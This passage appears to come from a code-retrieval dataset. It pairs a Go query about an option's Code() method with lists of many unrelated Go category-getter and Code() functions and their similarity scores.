\"database\":\n\t\treturn Database, nil\n\tcase \"integration-delivery\":\n\t\treturn IntegrationDelivery, nil\n\tcase \"monitoring-logging\":\n\t\treturn MonitoringLogging, nil\n\tcase \"networking\":\n\t\treturn Networking, nil\n\tcase \"security\":\n\t\treturn Security, nil\n\tcase \"storage\":\n\t\treturn Storage, nil\n\tcase \"streaming-messaging\":\n\t\treturn StreamingMessaging, nil\n\tdefault:\n\t\treturn -9, errors.New(\"invalid category name\")\n\t}\n}", "func (m *CloudPcAuditEvent) GetCategory()(*CloudPcAuditCategory) {\n val, err := m.GetBackingStore().Get(\"category\")\n if err != nil {\n panic(err)\n }\n if val != nil {\n return val.(*CloudPcAuditCategory)\n }\n return nil\n}", "func (o *IaasDeviceStatusAllOf) GetCategory() string {\n\tif o == nil || o.Category == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\treturn *o.Category\n}", "func (o *BulletinDTO) GetCategory() string {\n\tif o == nil || o.Category == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\treturn *o.Category\n}", "func (o ClusterNodeGroupSystemDiskOutput) Category() pulumi.StringOutput {\n\treturn o.ApplyT(func(v ClusterNodeGroupSystemDisk) string { return v.Category }).(pulumi.StringOutput)\n}", "func GetCategory(p providers.CategoryProvider) func(c *fiber.Ctx) error {\n\treturn func(c *fiber.Ctx) error {\n\t\tcategoryID, _ := strconv.Atoi(c.Params(\"id\"))\n\t\tcategory, err := p.CategoryGet(categoryID)\n\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\t// wrapped into array to it works in the template\n\t\tresult := make([]*models.Category, 0)\n\t\tresult = append(result, category)\n\t\treturn c.Render(\"category\", result)\n\t}\n}", "func (o *TransactionSplit) GetCategoryName() string {\n\tif o == nil || o.CategoryName.Get() == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\treturn *o.CategoryName.Get()\n}", "func (c *Client) GetIrModuleCategory(id int64) (*IrModuleCategory, error) {\n\timcs, err := c.GetIrModuleCategorys([]int64{id})\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tif imcs != nil && len(*imcs) > 0 {\n\t\treturn &((*imcs)[0]), nil\n\t}\n\treturn nil, fmt.Errorf(\"id %v of ir.module.category not found\", id)\n}", "func (m *GroupPolicyDefinition) GetCategory()(GroupPolicyCategoryable) {\n val, err := m.GetBackingStore().Get(\"category\")\n if err != nil {\n panic(err)\n }\n if val != nil {\n return val.(GroupPolicyCategoryable)\n }\n return nil\n}", "func (o ClusterNodeGroupDataDiskOutput) Category() pulumi.StringOutput {\n\treturn o.ApplyT(func(v ClusterNodeGroupDataDisk) string { return v.Category }).(pulumi.StringOutput)\n}", "func (m *WindowsMalwareCategoryCount) GetCategory()(*WindowsMalwareCategory) {\n val, err := m.GetBackingStore().Get(\"category\")\n if err != nil {\n panic(err)\n }\n if val != nil {\n return val.(*WindowsMalwareCategory)\n }\n return nil\n}", "func (s BuildResultStatus) Category() string {\n\tswitch s {\n\tcase PackageParsing, PackageParsed, ParseFailed:\n\t\treturn \"Parse\"\n\tcase TargetBuilding, TargetBuildStopped, TargetBuilt, TargetCached, TargetBuildFailed:\n\t\treturn \"Build\"\n\tcase TargetTesting, TargetTestStopped, TargetTested, TargetTestFailed:\n\t\treturn \"Test\"\n\tdefault:\n\t\treturn \"Other\"\n\t}\n}", "func (lb *Leaderboard) Category(embeds string) (*Category, *Error) {\n\t// we only have the category ID at hand\n\tasserted, okay := lb.CategoryData.(string)\n\tif okay {\n\t\treturn CategoryByID(asserted, embeds)\n\t}\n\n\treturn toCategory(lb.CategoryData, true), nil\n}", "func (da *DumbAnalyserImpl) GetCategory(message string) (cat string, confidence int) {\n\n\tfor k, v := range da.categories {\n\t\tfor _, keyword := range v {\n\t\t\tif strings.Contains(message, keyword) {\n\t\t\t\treturn k, 90\n\t\t\t}\n\t\t}\n\t}\n\treturn \"\", 0\n}", "func (g *Goods) Category(c Context) {\n\t// TODO\n\tc.String(http.StatusOK, \"get goods category\")\n}", "func (dc DevCat) Category() Category {\n\treturn Category(dc[0])\n}", "func (s *Server) GetCategoryByName(ctx context.Context, in *api.CategoryQuery) (*api.Category, error) {\n\tdb, err := domain.GetConnection(utilities.GetConfiguration())\n\tif err != nil {\n\t\tlog.Fatalf(\"GetCategoryByName, error while connecting to database: %v\", err)\n\t}\n\tdefer db.Close()\n\treturn domain.GetCategoryByName(db, in)\n}", "func (e Endpoints) GetCategory(ctx context.Context) (c []io.TodoCategory, error error) {\n\trequest := GetCategoryRequest{}\n\tresponse, err := e.GetCategoryEndpoint(ctx, request)\n\tif err != nil {\n\t\treturn\n\t}\n\treturn response.(GetCategoryResponse).C, response.(GetCategoryResponse).Error\n}", "func (m *SecureScoreControlProfile) GetControlCategory()(*string) {\n val, err := m.GetBackingStore().Get(\"controlCategory\")\n if err != nil {\n panic(err)\n }\n if val != nil {\n return val.(*string)\n }\n return nil\n}", "func (k Ktype) Category() Category {\n\tswitch k {\n\tcase CreateProcess, TerminateProcess, OpenProcess, ProcessRundown:\n\t\treturn Process\n\tcase CreateThread, TerminateThread, OpenThread, ThreadRundown:\n\t\treturn Thread\n\tcase LoadImage, UnloadImage, ImageRundown:\n\t\treturn Image\n\tcase CreateFile, ReadFile, WriteFile, EnumDirectory, DeleteFile, RenameFile, CloseFile, SetFileInformation,\n\t\tFileRundown, FileOpEnd, ReleaseFile, MapViewFile, UnmapViewFile, MapFileRundown:\n\t\treturn File\n\tcase RegCreateKey, RegDeleteKey, RegOpenKey, RegCloseKey, RegQueryKey, RegQueryValue, RegSetValue, RegDeleteValue,\n\t\tRegKCBRundown, RegDeleteKCB, RegCreateKCB:\n\t\treturn Registry\n\tcase AcceptTCPv4, AcceptTCPv6,\n\t\tConnectTCPv4, ConnectTCPv6,\n\t\tReconnectTCPv4, ReconnectTCPv6,\n\t\tRetransmitTCPv4, RetransmitTCPv6,\n\t\tDisconnectTCPv4, DisconnectTCPv6,\n\t\tSendTCPv4, SendTCPv6, SendUDPv4, SendUDPv6,\n\t\tRecvTCPv4, RecvTCPv6, RecvUDPv4, RecvUDPv6,\n\t\tQueryDNS, ReplyDNS:\n\t\treturn Net\n\tcase CreateHandle, CloseHandle, DuplicateHandle:\n\t\treturn Handle\n\tcase VirtualAlloc, VirtualFree:\n\t\treturn Mem\n\tdefault:\n\t\treturn Unknown\n\t}\n}", "func (o *CatalogEntry) GetCategory() string {\n\tif o == nil || o.Category == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\treturn *o.Category\n}", "func (m *SecureScoreControlProfile) GetControlCategory()(*string) {\n return m.controlCategory\n}", "func (w *withCode) Category() categories.Category {\n\tswitch code := w.Code().Int(); {\n\tcase code < 50:\n\t\treturn grpcCategory(w.Code())\n\tcase code >= 50 && code < 100:\n\t\treturn categories.Temporary\n\tcase code >= 100 && code < 150:\n\t\treturn categories.System\n\tcase code >= 150 && code < 200:\n\t\treturn categories.Data\n\tdefault:\n\t\treturn categories.Unknown\n\t}\n}", "func GetCategory(db *sql.DB, id int) (Category, error) {\n\tvar category Category\n\terr := db.QueryRow(`SELECT c.id, c.name FROM category c WHERE id = ($1)`,\n\t\tid).Scan(&category.ID, &category.Name)\n\n\tif err != nil {\n\t\treturn category, err\n\t}\n\n\treturn category, nil\n\n}", "func CategoryGet(c *gin.Context) {\n\tCategory, err := models.GetCategory(c.Param(\"name\"))\n\tif err != nil {\n\t\tc.HTML(http.StatusNotFound, \"errors/404\", nil)\n\t\treturn\n\t}\n\tvar filter models.DaoFilter\n\tfilter.Category.Name = Category.Name\n\tcount,_ := filter.GetPostsCount()\n\tcurrentPage, _ := strconv.Atoi(c.DefaultQuery(\"p\",\"1\"))\n\tlimit := 10\n\tPagination := helpers.NewPaginator(c,limit,count)\n\tlist, err := filter.GetPostsByPage(currentPage,limit)\n\tif err != nil {\n\t\tc.HTML(http.StatusNotFound, \"errors/404\", nil)\n\t\treturn\n\t}\n\n\th := helpers.DefaultH(c)\n\th[\"Title\"] = Category.Name\n\th[\"Category\"] = Category\n\th[\"Active\"] = \"categories\"\n\th[\"List\"] = list\n\th[\"Pagination\"] = Pagination\n\tc.HTML(http.StatusOK, \"categories/show\", h)\n}", "func (m *GroupPolicyDefinition) GetCategoryPath()(*string) {\n val, err := m.GetBackingStore().Get(\"categoryPath\")\n if err != nil {\n panic(err)\n }\n if val != nil {\n return val.(*string)\n }\n return nil\n}", "func (o *Transaction) GetCategory() []string {\n\tif o == nil {\n\t\tvar ret []string\n\t\treturn ret\n\t}\n\n\treturn o.Category\n}", "func (o *IaasMostRunTasksAllOf) GetTaskCategory() string {\n\tif o == nil || o.TaskCategory == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\treturn *o.TaskCategory\n}", "func GetCat(catid uint32) (models.Category, error) {\n\tvar catInfo models.Category\n\n\terr := DB.Where(\"id = ?\", catid).First(&catInfo).Error\n\n\tif err == gorm.ErrRecordNotFound {\n\t\tlog.Info.Println(err)\n\t\treturn catInfo, ErrNotFound\n\t} else if err != nil {\n\t\tlog.Warning.Println(err)\n\t\treturn catInfo, ErrInternal\n\t}\n\treturn catInfo, nil\n}", "func (o *TransactionSplit) GetCategoryId() string {\n\tif o == nil || o.CategoryId.Get() == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\treturn *o.CategoryId.Get()\n}", "func (e nlgElementData) Category() LexicalCategory {\n\treturn e.category\n}", "func (j *DSGitHub) ItemCategory(item interface{}) string {\n\treturn j.Category\n}", "func (g *GetTopChatsRequest) GetCategory() (value TopChatCategoryClass) {\n\tif g == nil {\n\t\treturn\n\t}\n\treturn g.Category\n}", "func (i ID) Category() Category {\n\treturn Category((i.Raw() & CategoryMask) >> BitwidthReserved)\n}", "func (m *TestcontainersModule) ContainerName() string {\n\tname := m.Lower()\n\n\tif m.IsModule {\n\t\tname = m.Title()\n\t} else {\n\t\tif m.TitleName != \"\" {\n\t\t\tr, n := utf8.DecodeRuneInString(m.TitleName)\n\t\t\tname = string(unicode.ToLower(r)) + m.TitleName[n:]\n\t\t}\n\t}\n\n\treturn name + \"Container\"\n}", "func (a *Adapter) Get(ctx context.Context, categoryCode string) (categoryDomain.Category, error) {\n\tt, err := a.categoryRepository.Category(ctx, categoryCode)\n\tif err == categoryDomain.ErrNotFound {\n\t\ta.logger.Warn(err)\n\t\treturn t, err\n\t}\n\tif err != nil {\n\t\ta.logger.Error(err)\n\t}\n\treturn t, err\n}", "func (_AccessIndexor *AccessIndexorCaller) CATEGORYGROUP(opts *bind.CallOpts) (uint8, error) {\n\tvar out []interface{}\n\terr := _AccessIndexor.contract.Call(opts, &out, \"CATEGORY_GROUP\")\n\n\tif err != nil {\n\t\treturn *new(uint8), err\n\t}\n\n\tout0 := *abi.ConvertType(out[0], new(uint8)).(*uint8)\n\n\treturn out0, err\n\n}", "func (t Type) Category() orc.Category {\n\tswitch t {\n\tcase Int32:\n\t\treturn orc.CategoryInt\n\tcase Int64:\n\t\treturn orc.CategoryLong\n\tcase Float64:\n\t\treturn orc.CategoryDouble\n\tcase String:\n\t\treturn orc.CategoryString\n\tcase Bool:\n\t\treturn orc.CategoryBoolean\n\tcase Timestamp:\n\t\treturn orc.CategoryTimestamp\n\tcase JSON:\n\t\treturn orc.CategoryString\n\t}\n\n\tpanic(fmt.Errorf(\"typeof: orc type for %v is not found\", t))\n}", "func (m *DeviceCategory) GetDescription()(*string) {\n val, err := m.GetBackingStore().Get(\"description\")\n if err != nil {\n panic(err)\n }\n if val != nil {\n return val.(*string)\n }\n return nil\n}", "func shouldCategory(cat Category, lvl Level) (ok bool, name string) {\n\tcatmx.RLock()\n\tif lvl >= categories[cat].lvl {\n\t\tok = true\n\t\tname = categories[cat].name\n\t}\n\tcatmx.RUnlock()\n\treturn\n}", "func (c *Client) FindIrModuleCategory(criteria *Criteria) (*IrModuleCategory, error) {\n\timcs := &IrModuleCategorys{}\n\tif err := c.SearchRead(IrModuleCategoryModel, criteria, NewOptions().Limit(1), imcs); err != nil {\n\t\treturn nil, err\n\t}\n\tif imcs != nil && len(*imcs) > 0 {\n\t\treturn &((*imcs)[0]), nil\n\t}\n\treturn nil, fmt.Errorf(\"ir.module.category was not found with criteria %v\", criteria)\n}", "func (me TxsdSystemCategory) String() string { return xsdt.Nmtoken(me).String() }", "func (_BaseAccessWallet *BaseAccessWalletCaller) CATEGORYGROUP(opts *bind.CallOpts) (uint8, error) {\n\tvar out []interface{}\n\terr := _BaseAccessWallet.contract.Call(opts, &out, \"CATEGORY_GROUP\")\n\n\tif err != nil {\n\t\treturn *new(uint8), err\n\t}\n\n\tout0 := *abi.ConvertType(out[0], new(uint8)).(*uint8)\n\n\treturn out0, err\n\n}", "func (c Controller) Category(id int) (*model.Category, error) {\n\treturn c.CategoriesRepository.Get(id, \"\")\n}", "func (cRepo *CategoryGormRepo) Category(id uint) (*entity.Category, []error) {\n\tctg := entity.Category{}\n\terrs := cRepo.conn.First(&ctg, id).GetErrors()\n\tif len(errs) > 0 {\n\t\treturn nil, errs\n\t}\n\treturn &ctg, errs\n}", "func (o *Transaction) GetCategoryId() string {\n\tif o == nil || o.CategoryId.Get() == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn *o.CategoryId.Get()\n}", "func (o *InlineResponse200115) GetCategory() InlineResponse2002Column {\n\tif o == nil || o.Category == nil {\n\t\tvar ret InlineResponse2002Column\n\t\treturn ret\n\t}\n\treturn *o.Category\n}", "func (_BaseAccessControlGroup *BaseAccessControlGroupCaller) CATEGORYGROUP(opts *bind.CallOpts) (uint8, error) {\n\tvar out []interface{}\n\terr := _BaseAccessControlGroup.contract.Call(opts, &out, \"CATEGORY_GROUP\")\n\n\tif err != nil {\n\t\treturn *new(uint8), err\n\t}\n\n\tout0 := *abi.ConvertType(out[0], new(uint8)).(*uint8)\n\n\treturn out0, err\n\n}", "func (c *Client) GetCategories() string {\n\turl := fmt.Sprintf(c.baseURL + \"categories\")\n\n\tres, err := http.Get(url)\n\tif err != nil {\n\t\tlog.Fatalln(err)\n\t}\n\n\tbody, err := ioutil.ReadAll(res.Body)\n\tif err != nil {\n\t\tlog.Fatalln(err)\n\t}\n\n\treturn string(body)\n}", "func (m *State) Category(channelID discord.Snowflake) bool {\n\tc, err := m.store.Channel(channelID)\n\tif err != nil || !c.CategoryID.Valid() {\n\t\treturn false\n\t}\n\n\treturn m.Channel(c.CategoryID)\n}", "func (m *ThreatAssessmentRequest) GetCategory()(*ThreatCategory) {\n val, err := m.GetBackingStore().Get(\"category\")\n if err != nil {\n panic(err)\n }\n if val != nil {\n return val.(*ThreatCategory)\n }\n return nil\n}", "func (m *DeviceCategory) GetDisplayName()(*string) {\n val, err := m.GetBackingStore().Get(\"displayName\")\n if err != nil {\n panic(err)\n }\n if val != nil {\n return val.(*string)\n }\n return nil\n}", "func (o LookupRegionCommitmentResultOutput) Category() pulumi.StringOutput {\n\treturn o.ApplyT(func(v LookupRegionCommitmentResult) string { return v.Category }).(pulumi.StringOutput)\n}", "func (w *ServerInterfaceWrapper) GetCategoryCategoryId(ctx echo.Context) error {\n\tvar err error\n\t// ------------- Path parameter \"categoryId\" -------------\n\tvar categoryId CategoryIdParameter\n\n\terr = runtime.BindStyledParameter(\"simple\", false, \"categoryId\", ctx.Param(\"categoryId\"), &categoryId)\n\tif err != nil {\n\t\treturn echo.NewHTTPError(http.StatusBadRequest, fmt.Sprintf(\"Invalid format for parameter categoryId: %s\", err))\n\t}\n\n\t// Invoke the callback with all the unmarshalled arguments\n\terr = w.Handler.GetCategoryCategoryId(ctx, categoryId)\n\treturn err\n}", "func GetCategory(response http.ResponseWriter, request *http.Request) {\n\t//var results TCategory\n\tvar errorResponse = ErrorResponse{\n\t\tCode: http.StatusInternalServerError, Message: \"Internal Server Error.\",\n\t}\n\n\tcollection := Client.Database(\"msdb\").Collection(\"t_cat_mg\")\n\tctx, cancel := context.WithTimeout(context.Background(), 10*time.Second)\n\tcursor, err := collection.Find(ctx, bson.M{})\n\tvar results []bson.M\n\terr = cursor.All(ctx, &results)\n\n\tdefer cancel()\n\n\tif err != nil {\n\t\terrorResponse.Message = \"Document not found\"\n\t\treturnErrorResponse(response, request, errorResponse)\n\t} else {\n\t\tvar successResponse = SuccessResponse{\n\t\t\tCode: http.StatusOK,\n\t\t\tMessage: \"Success\",\n\t\t\tResponse: results,\n\t\t}\n\n\t\tsuccessJSONResponse, jsonError := json.Marshal(successResponse)\n\n\t\tif jsonError != nil {\n\t\t\treturnErrorResponse(response, request, errorResponse)\n\t\t}\n\t\tresponse.Header().Set(\"Content-Type\", \"application/json\")\n\t\tresponse.Write(successJSONResponse)\n\t}\n\n}", "func GetPathToCategory(category string) string {\n\treturn \"categories/\" + category + \"/category.yaml\"\n}", "func (o *InlineObject26) GetCategory() MessageCategoriesIdJsonCategory {\n\tif o == nil {\n\t\tvar ret MessageCategoriesIdJsonCategory\n\t\treturn ret\n\t}\n\n\treturn o.Category\n}", "func (m *ThreatAssessmentRequest) GetCategory()(*ThreatCategory) {\n return m.category\n}", "func (j *DSGit) Categories() map[string]struct{} {\n\treturn GitCategories\n}", "func (o *EventAttributes) GetSourcecategory() string {\n\tif o == nil || o.Sourcecategory == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\treturn *o.Sourcecategory\n}", "func (cri *CategoryRepositoryImpl) Category(id int) (entity.Category, error) {\n\n\trow := cri.conn.QueryRow(\"SELECT * FROM categories WHERE id = $1\", id)\n\n\tc := entity.Category{}\n\n\terr := row.Scan(&c.ID, &c.Name, &c.Description, &c.Image)\n\tif err != nil {\n\t\treturn c, err\n\t}\n\n\treturn c, nil\n}", "func (j *DSGitHub) Categories() map[string]struct{} {\n\treturn GitHubCategories\n}", "func (_Mcapscontroller *McapscontrollerCallerSession) CategoryIndex() (*big.Int, error) {\n\treturn _Mcapscontroller.Contract.CategoryIndex(&_Mcapscontroller.CallOpts)\n}", "func getClusterNameLabel() string {\n\tkey := fmt.Sprintf(\"%s/cluster-name\", getCAPIGroup())\n\treturn key\n}", "func (client *Client) GetCategory(alias string, request CategoriesSearchParam) (response CategoryDetailResponse, err error) {\n\turl := fmt.Sprintf(\"/categories/%s\", alias)\n\n\tif err := client.query(url, &request, &response); err != nil {\n\t\treturn response, err\n\t}\n\treturn response, nil\n\n}", "func (n *natsDependency) GetContainerName() string {\n\treturn n.config.Name + n.config.Version\n}", "func GetCategories() []string {\n\tstmt := \"select name from category\"\n\trows := database.query(stmt)\n\tvar categories []string\n\tvar category string\n\n\tfor rows.Next() {\n\t\terr := rows.Scan(&category)\n\t\tif err != nil {\n\t\t\tlog.Println(err)\n\t\t}\n\t\tcategories = append(categories, category)\n\t}\n\treturn categories\n}", "func (c Category) String() string {\n\ts := \"\"\n\tif c.Main != 0 {\n\t\ts += strconv.Itoa(int(c.Main))\n\t}\n\ts += \"_\"\n\tif c.Sub != 0 {\n\t\ts += strconv.Itoa(int(c.Sub))\n\t}\n\treturn s\n}", "func (m *Group) GetClassification()(*string) {\n return m.classification\n}", "func (f *FaasController) Category() supervisor.ObjectCategory {\n\treturn Category\n}", "func (m *WorkbookChartAxes) GetCategoryAxis()(WorkbookChartAxisable) {\n return m.categoryAxis\n}", "func (tk Kinds) Cat() Kinds {\n\treturn CatMap[tk]\n}", "func (_Mcapscontroller *McapscontrollerSession) CategoryIndex() (*big.Int, error) {\n\treturn _Mcapscontroller.Contract.CategoryIndex(&_Mcapscontroller.CallOpts)\n}", "func RenameCategory(oldCategoryName string, newCategoryName string) {\n\tfmt.Println(\"Rename category \" + oldCategoryName + \" to \" + newCategoryName + \".\")\n\n\tfile, err := ioutil.ReadFile(getConfigPath())\n\tif err != nil {\n\t\tlog.Fatalln(err)\n\t}\n\n\tlines := strings.Split(string(file), \"\\n\")\n\n\tfor i, line := range lines {\n\t\tif strings.Contains(line, oldCategoryName) {\n\t\t\tsplittedLine := strings.Split(line, \" \")\n\t\t\tstreamerName := splittedLine[0]\n\t\t\tlines[i] = streamerName + \" \" + newCategoryName\n\t\t}\n\t}\n\n\toutput := strings.Join(lines, \"\\n\")\n\terr = ioutil.WriteFile(getConfigPath(), []byte(output), 0600)\n\tif err != nil {\n\t\tlog.Fatalln(err)\n\t}\n}", "func getStatementCategory(sql string) binlogdatapb.BinlogTransaction_Statement_Category {\n\tif i := strings.IndexByte(sql, byte(' ')); i >= 0 {\n\t\tsql = sql[:i]\n\t}\n\treturn statementPrefixes[strings.ToLower(sql)]\n}", "func groupName(pkg *types.Package) string {\n\tm := types.ExtractCommentTags(\"+\", pkg.Comments)\n\tv := m[\"groupName\"]\n\tif len(v) == 1 {\n\t\treturn v[0]\n\t}\n\treturn \"\"\n}", "func (o OceanFiltersOutput) Categories() pulumi.StringArrayOutput {\n\treturn o.ApplyT(func(v OceanFilters) []string { return v.Categories }).(pulumi.StringArrayOutput)\n}" ]
[ "0.7168049", "0.7056861", "0.6867676", "0.6864481", "0.6832735", "0.6789213", "0.6726447", "0.65613014", "0.6523389", "0.65107214", "0.64703894", "0.6399247", "0.63079035", "0.6284974", "0.6259871", "0.62503314", "0.6238926", "0.6224922", "0.61545014", "0.6119946", "0.6119148", "0.6106655", "0.6105961", "0.59979874", "0.5943719", "0.5907027", "0.58634055", "0.5859745", "0.5829525", "0.5828841", "0.5817301", "0.5806116", "0.5803165", "0.57916343", "0.57326233", "0.5674686", "0.56562907", "0.56549114", "0.5629631", "0.56213856", "0.55560607", "0.5555249", "0.5551122", "0.55483377", "0.5546087", "0.5505123", "0.5443805", "0.5443018", "0.54151803", "0.5410261", "0.5312004", "0.53078663", "0.53005564", "0.5277914", "0.52702034", "0.5247642", "0.5243633", "0.5238622", "0.5235148", "0.5213422", "0.5212833", "0.52026755", "0.51954925", "0.5192279", "0.5187067", "0.5164761", "0.514946", "0.51445425", "0.51341397", "0.5130941", "0.5129724", "0.5086965", "0.50824606", "0.507891", "0.50340354", "0.5029197", "0.5027562", "0.5020286", "0.5001745", "0.49910244", "0.4987954", "0.4987764", "0.49736673", "0.4967484", "0.49593538", "0.4956634", "0.49540132", "0.49494442", "0.49442312", "0.49328086", "0.49319", "0.4930525", "0.49246746", "0.49125206", "0.49021348", "0.48944038", "0.48826015", "0.4876676", "0.4870118", "0.48629174" ]
0.84576774
0
Code returns the option's code
func (op *OptIAAddress) Code() OptionCode { return OptionIAAddr }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (op *OptVendorOpts) Code() OptionCode {\n\treturn OptionVendorOpts\n}", "func (o *BuildComboFormDescriptorOK) Code() int {\n\treturn 200\n}", "func (op *OptDHCPv4Msg) Code() OptionCode {\n\treturn OptionDHCPv4Msg\n}", "func (op *optClientLinkLayerAddress) Code() OptionCode {\n\treturn OptionClientLinkLayerAddr\n}", "func (op *optDNS) Code() OptionCode {\n\treturn OptionDNSRecursiveNameServer\n}", "func (o Option) StoreCode() (code string) {\n\tif sc, ok := o.Store.(StoreCoder); ok {\n\t\tcode = sc.StoreCode()\n\t}\n\treturn\n}", "func (e *HTMLApplet) Code(v string) *HTMLApplet {\n\te.a[\"code\"] = v\n\treturn e\n}", "func (o Option) WebsiteCode() (code string) {\n\tif wc, ok := o.Website.(WebsiteCoder); ok {\n\t\tcode = wc.WebsiteCode()\n\t}\n\treturn\n}", "func (op *OptDomainSearch) Code() OptionCode {\n\treturn OptionDNSDomainSearchList\n}", "func (w *WithCode) Code() AppErrCode { return w.code }", "func (coder defaultCoder) Code() int {\n\treturn coder.C\n\n}", "func (c *Control) GetCode() int {\n\treturn c.code\n}", "func (o *GetVersionStagesOK) Code() int {\n\treturn 200\n}", "func (o *GetVersionStagesDefault) Code() int {\n\treturn o._statusCode\n}", "func (c *Control) Code(code int) *Control {\n\tif code >= 200 && code < 600 {\n\t\tc.code = code\n\t}\n\treturn c\n}", "func (c CodeAuthenticatorFunc) Code(ctx context.Context) (string, error) {\n\treturn c(ctx)\n}", "func (o *CreateAntivirusServerDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *GetVpsServiceNameActiveOptionsDefault) Code() int {\n\treturn o._statusCode\n}", "func (o BackendServiceCdnPolicyNegativeCachingPolicyOutput) Code() pulumi.IntPtrOutput {\n\treturn o.ApplyT(func(v BackendServiceCdnPolicyNegativeCachingPolicy) *int { return v.Code }).(pulumi.IntPtrOutput)\n}", "func (o *GetVersionStagesForbidden) Code() int {\n\treturn 403\n}", "func (o DiagnosticConditionResponseOutput) Code() pulumi.StringOutput {\n\treturn o.ApplyT(func(v DiagnosticConditionResponse) string { return v.Code }).(pulumi.StringOutput)\n}", "func (o *GetProductsByIDProductOptionsByIDDefault) Code() int {\n\treturn o._statusCode\n}", "func (o BackendBucketCdnPolicyNegativeCachingPolicyOutput) Code() pulumi.IntPtrOutput {\n\treturn o.ApplyT(func(v BackendBucketCdnPolicyNegativeCachingPolicy) *int { return v.Code }).(pulumi.IntPtrOutput)\n}", "func (s *NoFreeAddressesInSubnet) Code() string {\n\treturn \"NoFreeAddressesInSubnet\"\n}", "func (o BackendServiceCdnPolicyNegativeCachingPolicyResponseOutput) Code() pulumi.IntOutput {\n\treturn o.ApplyT(func(v BackendServiceCdnPolicyNegativeCachingPolicyResponse) int { return v.Code }).(pulumi.IntOutput)\n}", "func (scode Scancode) Code() Code {\n\treturn Code(C.SDL_GetKeyFromScancode(C.SDL_Scancode(scode)))\n}", "func (o *GetProductsByIDProductOptionsByIDValuesDefault) Code() int {\n\treturn o._statusCode\n}", "func (o BackendBucketCdnPolicyNegativeCachingPolicyResponseOutput) Code() pulumi.IntOutput {\n\treturn o.ApplyT(func(v BackendBucketCdnPolicyNegativeCachingPolicyResponse) int { return v.Code }).(pulumi.IntOutput)\n}", "func (e Errorcode) Code() codes.Code {\n\treturn e.code\n}", "func Code(code int) {\n\tDefault.ExitCode = code\n\tpanic(msg{Default, \"\"})\n}", "func (o *GetVersionDefault) Code() int {\n\treturn o._statusCode\n}", "func (m *Country) Code() string {\n\treturn m.ID\n}", "func (s *IncorrectMountTargetState) Code() string {\n\treturn \"IncorrectMountTargetState\"\n}", "func (o *ListProviderPresetsDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *UpdateAntivirusServerDefault) Code() int {\n\treturn o._statusCode\n}", "func (s *IpAddressInUse) Code() string {\n\treturn \"IpAddressInUse\"\n}", "func (o *GetVersionStagesNotFound) Code() int {\n\treturn 404\n}", "func (e e) Code() int {\n\treturn e.ErrorCode\n}", "func (o *ListVirtualCircuitsDefault) Code() int {\n\treturn o._statusCode\n}", "func (s *TooManyRequests) Code() string {\n\treturn \"TooManyRequests\"\n}", "func (o *GetBuildScriptDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *CreateServerSwitchingRuleDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *GetCurrentUserSettingsDefault) Code() int {\n\treturn o._statusCode\n}", "func (s *EffectivePolicyNotFoundException) Code() string {\n\treturn \"EffectivePolicyNotFoundException\"\n}", "func (s *FileSystemLimitExceeded) Code() string {\n\treturn \"FileSystemLimitExceeded\"\n}", "func (fn *formulaFuncs) CODE(argsList *list.List) formulaArg {\n\treturn fn.code(\"CODE\", argsList)\n}", "func (o *ValidateRecipeDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *GetVersionOK) Code() int {\n\treturn 200\n}", "func (c *SeaterController) Code(code int) {\n\tc.Ctx.Output.SetStatus(code)\n}", "func (o GoogleRpcStatusResponseOutput) Code() pulumi.IntOutput {\n\treturn o.ApplyT(func(v GoogleRpcStatusResponse) int { return v.Code }).(pulumi.IntOutput)\n}", "func (s *AccessPointLimitExceeded) Code() string {\n\treturn \"AccessPointLimitExceeded\"\n}", "func (s *UnsupportedAvailabilityZone) Code() string {\n\treturn \"UnsupportedAvailabilityZone\"\n}", "func (o *GetAvailableExtensionsUUIDDefault) Code() int {\n\treturn o._statusCode\n}", "func (o *GetDomainDataExtensionDefault) Code() int {\n\treturn o._statusCode\n}", "func (s *SecurityGroupLimitExceeded) Code() string {\n\treturn \"SecurityGroupLimitExceeded\"\n}", "func (s *SecurityGroupNotFound) Code() string {\n\treturn \"SecurityGroupNotFound\"\n}", "func (s *IncorrectFileSystemLifeCycleState) Code() string {\n\treturn \"IncorrectFileSystemLifeCycleState\"\n}", "func (p *Matcher) Code() string {\n\treturn Code(p.Grammar, p.requireScanner())\n}", "func (o *GetAPIFeaturesNameDefault) Code() int {\n\treturn o._statusCode\n}", "func (o SslPolicyWarningsItemResponseOutput) Code() pulumi.StringOutput {\n\treturn o.ApplyT(func(v SslPolicyWarningsItemResponse) string { return v.Code }).(pulumi.StringOutput)\n}", "func (o *StartMySQLShowIndexActionDefault) Code() int {\n\treturn o._statusCode\n}", "func (s *AccessPointNotFound) Code() string {\n\treturn \"AccessPointNotFound\"\n}", "func (o *GetSiteScriptDefault) Code() int {\n\treturn o._statusCode\n}", "func (s *SubnetNotFound) Code() string {\n\treturn \"SubnetNotFound\"\n}", "func (o *GetPolicyUUIDDefault) Code() int {\n\treturn o._statusCode\n}", "func (e ConstraintError) Code() (string, []any) {\n\treturn strconv.Quote(e.prefix() + e.msg), nil\n}", "func (coder *ErrCode) Code() int {\n\treturn coder.C\n}", "func (o *Giveaway) GetCode() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.Code\n}", "func (s *NotSupportedOperationException) Code() string {\n\treturn \"NotSupportedOperationException\"\n}", "func (o StatusResponseOutput) Code() pulumi.IntOutput {\n\treturn o.ApplyT(func(v StatusResponse) int { return v.Code }).(pulumi.IntOutput)\n}", "func (o *GetAppsAppIDOperationsDefault) Code() int {\n\treturn o._statusCode\n}", "func (o 